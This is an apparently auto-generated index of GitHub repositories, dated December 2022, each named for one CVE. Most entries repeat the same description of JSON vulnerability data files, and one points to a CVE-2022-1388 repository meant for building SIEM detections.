**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39885 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39885](https://github.com/Live-Hack-CVE/CVE-2021-39885) create time: 2022-12-24T18:39:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39888 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39888](https://github.com/Live-Hack-CVE/CVE-2021-39888) create time: 2022-12-24T18:39:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39904 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39904](https://github.com/Live-Hack-CVE/CVE-2021-39904) create time: 2022-12-24T18:39:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39911 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39911](https://github.com/Live-Hack-CVE/CVE-2021-39911) create time: 2022-12-24T18:39:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39913 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39913](https://github.com/Live-Hack-CVE/CVE-2021-39913) create time: 2022-12-24T18:39:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3744 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3744](https://github.com/Live-Hack-CVE/CVE-2021-3744) create time: 2022-12-24T18:38:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21467 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21467](https://github.com/Live-Hack-CVE/CVE-2021-21467) create time: 2022-12-24T18:38:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46167 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46167](https://github.com/Live-Hack-CVE/CVE-2021-46167) create time: 2022-12-24T18:34:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3749 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3749](https://github.com/Live-Hack-CVE/CVE-2021-3749) create time: 2022-12-24T18:32:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23133 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23133](https://github.com/Live-Hack-CVE/CVE-2021-23133) create time: 2022-12-24T18:32:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31583 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31583](https://github.com/Live-Hack-CVE/CVE-2021-31583) create time: 2022-12-24T18:32:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20267 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20267](https://github.com/Live-Hack-CVE/CVE-2021-20267) create time: 2022-12-24T18:31:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23146 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23146](https://github.com/Live-Hack-CVE/CVE-2021-23146) create time: 2022-12-24T18:31:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20269 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20269](https://github.com/Live-Hack-CVE/CVE-2021-20269) create time: 2022-12-24T18:31:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34047 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34047](https://github.com/Live-Hack-CVE/CVE-2022-34047) create time: 2022-12-24T18:41:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36066 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36066](https://github.com/Live-Hack-CVE/CVE-2022-36066) create time: 2022-12-24T18:41:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22589 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22589](https://github.com/Live-Hack-CVE/CVE-2022-22589) create time: 2022-12-24T18:41:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42242 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42242](https://github.com/Live-Hack-CVE/CVE-2022-42242) create time: 2022-12-24T18:41:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42241 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42241](https://github.com/Live-Hack-CVE/CVE-2022-42241) create time: 2022-12-24T18:41:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42243 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42243](https://github.com/Live-Hack-CVE/CVE-2022-42243) create time: 2022-12-24T18:41:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42249 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42249](https://github.com/Live-Hack-CVE/CVE-2022-42249) create time: 2022-12-24T18:40:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42250 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42250](https://github.com/Live-Hack-CVE/CVE-2022-42250) create time: 2022-12-24T18:40:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33880 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33880](https://github.com/Live-Hack-CVE/CVE-2022-33880) create time: 2022-12-24T18:39:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35137 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35137](https://github.com/Live-Hack-CVE/CVE-2022-35137) create time: 2022-12-24T18:39:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39988 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39988](https://github.com/Live-Hack-CVE/CVE-2022-39988) create time: 2022-12-24T18:37:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3389 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3389](https://github.com/Live-Hack-CVE/CVE-2022-3389) create time: 2022-12-24T18:37:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3396 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3396](https://github.com/Live-Hack-CVE/CVE-2022-3396) create time: 2022-12-24T18:37:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3398 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3398](https://github.com/Live-Hack-CVE/CVE-2022-3398) create time: 2022-12-24T18:37:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3397 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3397](https://github.com/Live-Hack-CVE/CVE-2022-3397) create time: 2022-12-24T18:37:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25236 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25236](https://github.com/Live-Hack-CVE/CVE-2022-25236) create time: 2022-12-24T18:35:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26291 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26291](https://github.com/Live-Hack-CVE/CVE-2022-26291) create time: 2022-12-24T18:35:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29429 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29429](https://github.com/Live-Hack-CVE/CVE-2022-29429) create time: 2022-12-24T18:33:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23626 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23626](https://github.com/Live-Hack-CVE/CVE-2022-23626) create time: 2022-12-24T18:31:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20625 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20625](https://github.com/Live-Hack-CVE/CVE-2022-20625) create time: 2022-12-24T18:31:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22793 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22793](https://github.com/Live-Hack-CVE/CVE-2022-22793) create time: 2022-12-24T18:31:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22794 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22794](https://github.com/Live-Hack-CVE/CVE-2022-22794) create time: 2022-12-24T18:31:23Z

**-- FOR EDUCATIONAL USE ONLY -- The author is not responsible or held liable for any actions taken with any aspect of this project/repository. I created this for the purposes of building a detection within a SIEM and wanted to share for others to do the same. Use at your own risk.** : [vaelwolf/CVE-2022-1388](https://github.com/vaelwolf/CVE-2022-1388) create time: 2022-12-24T03:59:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-15108 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-15108](https://github.com/Live-Hack-CVE/CVE-2017-15108) create time: 2022-12-24T17:59:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-5696 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-5696](https://github.com/Live-Hack-CVE/CVE-2018-5696) create time: 2022-12-24T17:57:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-17767 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-17767](https://github.com/Live-Hack-CVE/CVE-2018-17767) create time: 2022-12-24T17:55:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-17769 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-17769](https://github.com/Live-Hack-CVE/CVE-2018-17769) create time: 2022-12-24T17:55:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-17771 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-17771](https://github.com/Live-Hack-CVE/CVE-2018-17771) create time: 2022-12-24T17:55:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-17768 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-17768](https://github.com/Live-Hack-CVE/CVE-2018-17768) create time: 2022-12-24T17:54:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9591 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9591](https://github.com/Live-Hack-CVE/CVE-2019-9591) create time: 2022-12-24T18:01:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9592 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9592](https://github.com/Live-Hack-CVE/CVE-2019-9592) create time: 2022-12-24T18:00:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17563 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17563](https://github.com/Live-Hack-CVE/CVE-2019-17563) create time: 2022-12-24T17:59:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-11498 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-11498](https://github.com/Live-Hack-CVE/CVE-2019-11498) create time: 2022-12-24T17:59:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-11840 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-11840](https://github.com/Live-Hack-CVE/CVE-2019-11840) create time: 2022-12-24T17:58:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17359 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17359](https://github.com/Live-Hack-CVE/CVE-2019-17359) create time: 2022-12-24T17:58:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-11135 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-11135](https://github.com/Live-Hack-CVE/CVE-2019-11135) create time: 2022-12-24T17:57:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-1010315 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-1010315](https://github.com/Live-Hack-CVE/CVE-2019-1010315) create time: 2022-12-24T17:57:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9593 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9593](https://github.com/Live-Hack-CVE/CVE-2019-9593) create time: 2022-12-24T17:57:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-11338 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-11338](https://github.com/Live-Hack-CVE/CVE-2019-11338) create time: 2022-12-24T17:55:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19451 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19451](https://github.com/Live-Hack-CVE/CVE-2019-19451) create time: 2022-12-24T17:55:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5813 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5813](https://github.com/Live-Hack-CVE/CVE-2019-5813) create time: 2022-12-24T17:54:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5846 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5846](https://github.com/Live-Hack-CVE/CVE-2019-5846) create time: 2022-12-24T17:54:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5845 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5845](https://github.com/Live-Hack-CVE/CVE-2019-5845) create time: 2022-12-24T17:54:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5844 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5844](https://github.com/Live-Hack-CVE/CVE-2019-5844) create time: 2022-12-24T17:54:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5825 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5825](https://github.com/Live-Hack-CVE/CVE-2019-5825) create time: 2022-12-24T17:53:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5984 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5984](https://github.com/Live-Hack-CVE/CVE-2019-5984) create time: 2022-12-24T17:53:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5983 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5983](https://github.com/Live-Hack-CVE/CVE-2019-5983) create time: 2022-12-24T17:53:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5980 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5980](https://github.com/Live-Hack-CVE/CVE-2019-5980) create time: 2022-12-24T17:53:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16770 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16770](https://github.com/Live-Hack-CVE/CVE-2019-16770) create time: 2022-12-24T17:19:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9139 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9139](https://github.com/Live-Hack-CVE/CVE-2019-9139) create time: 2022-12-24T17:19:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2964 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2964](https://github.com/Live-Hack-CVE/CVE-2019-2964) create time: 2022-12-24T17:18:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9274 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9274](https://github.com/Live-Hack-CVE/CVE-2020-9274) create time: 2022-12-24T18:01:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9490 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9490](https://github.com/Live-Hack-CVE/CVE-2020-9490) create time: 2022-12-24T18:01:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8618 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8618](https://github.com/Live-Hack-CVE/CVE-2020-8618) create time: 2022-12-24T18:00:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24583 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24583](https://github.com/Live-Hack-CVE/CVE-2020-24583) create time: 2022-12-24T18:00:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10199 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10199](https://github.com/Live-Hack-CVE/CVE-2020-10199) create time: 2022-12-24T18:00:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24584 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24584](https://github.com/Live-Hack-CVE/CVE-2020-24584) create time: 2022-12-24T18:00:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10189 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10189](https://github.com/Live-Hack-CVE/CVE-2020-10189) create time: 2022-12-24T17:59:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10221 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10221](https://github.com/Live-Hack-CVE/CVE-2020-10221) create time: 2022-12-24T17:59:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2152 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2152](https://github.com/Live-Hack-CVE/CVE-2020-2152) create time: 2022-12-24T17:59:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2159 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2159](https://github.com/Live-Hack-CVE/CVE-2020-2159) create time: 2022-12-24T17:59:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6425 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6425](https://github.com/Live-Hack-CVE/CVE-2020-6425) create time: 2022-12-24T17:59:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14345 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14345](https://github.com/Live-Hack-CVE/CVE-2020-14345) create time: 2022-12-24T17:59:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8838 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8838](https://github.com/Live-Hack-CVE/CVE-2020-8838) create time: 2022-12-24T17:58:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13527 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13527](https://github.com/Live-Hack-CVE/CVE-2020-13527) create time: 2022-12-24T17:58:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10480 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10480](https://github.com/Live-Hack-CVE/CVE-2020-10480) create time: 2022-12-24T17:58:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6565 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6565](https://github.com/Live-Hack-CVE/CVE-2020-6565) create time: 2022-12-24T17:57:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6566 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6566](https://github.com/Live-Hack-CVE/CVE-2020-6566) create time: 2022-12-24T17:57:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8865 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8865](https://github.com/Live-Hack-CVE/CVE-2020-8865) create time: 2022-12-24T17:57:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8833 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8833](https://github.com/Live-Hack-CVE/CVE-2020-8833) create time: 2022-12-24T17:57:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25866 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25866](https://github.com/Live-Hack-CVE/CVE-2020-25866) create time: 2022-12-24T17:57:23Z

